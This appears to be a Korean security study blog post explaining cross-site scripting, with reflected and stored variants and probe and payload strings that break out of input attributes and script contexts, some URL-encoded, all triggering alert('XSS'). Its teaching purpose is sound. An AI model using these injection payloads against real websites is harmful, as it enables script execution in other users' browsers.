KGPstudio
Published 2023. 5. 15. 13:02
XSS WEB
반응형

개요

  • 공격자가 삽입 또는 제공한 악의적인 스크립트가 사용자의 브라우저에서 실행되는 취약점

원인

  • 악의적인 스크립트 코드가 삽입된 입력값을 서버가 적절한 검증절차 없이 반환 하는 것

Reflected XSS (반사형 크로스사이트 스크립팅)

  • 공격자가 악의적인 스크립트가 포함된 url을 메신저, 메일 등을 이용하여 사용자에게 노출시키고 이 url에 사용자가 접근 할 경우 스크립트가 실행되어 피해를 발생시킴
<input class="form-control multiselect-search" id="keyword" name="keyword" type="text" value="
"/><script>alert(1);</script><test data=""
onkeyup="search();"/>

//매개변수 중 필터링이 되지 않는 부분 탐색
GET /exam16/notice.php?pageIndex=pagetestxss<>/&board_id=board_idxss<>/&sorting=sortingxss<>/&sotingAd=DESC&startDt=&endDt=&searchType=&keyword=

//공격코드
"/><script>alert(1);</script><test+data="

'%3balert("XSS")%3bvar+b%3d'

'%3b}alert("XSS")%3b{'

//최종 공격 코드
'%3b}alert("XSS")%3bfunction+at(){var+b+%3d'

var+a+%3d+%27%3b%7dalert(%22XSS%22)%3bfunction(aa)%7bvar+b%3d%27%2c

 

Stored XSS

  • 공격자가 악의적인 스크립트를 취약한 서버에 게시물 형태로 등록 시킨 후 사용자가 해당 게시물에 접근 시 스크립트가 실행되어 피해를 발생시킴

공격방식

  1. 입력값이 그대로 문자열로 나올 때
    1. <p> 입력값 </p>
  2. 입력값이 tag안에서 나올 때
    1. <input type=”text” value=”입력값”/>
    2. 입력값 : “/> <test data=”
    3. <input type = “text” value””/> <img scr = x onclick=”alert();”/>
  3. 입력값이 <sciprt>안에 있을 때
    1. <sciprt> 태그 확인하여 공격문 삽입 “/~~
  4. tag안에 입력값이 들어가는데 scipt도 안되고 <> 안되고 img 안되는 경우
    1. <input type=”text” value=””/>
    2. 입력값 “ onkeydown=”alert(’XSS’)” data=”
반응형

'WEB' 카테고리의 다른 글

XSS 의 대응방안  (1) 2023.08.03
SQL Injection 정리  (0) 2023.05.15
profile

KGPstudio

@KGP-Admin

포스팅이 좋았다면 "좋아요❤️" 또는 "구독👍🏻" 해주세요!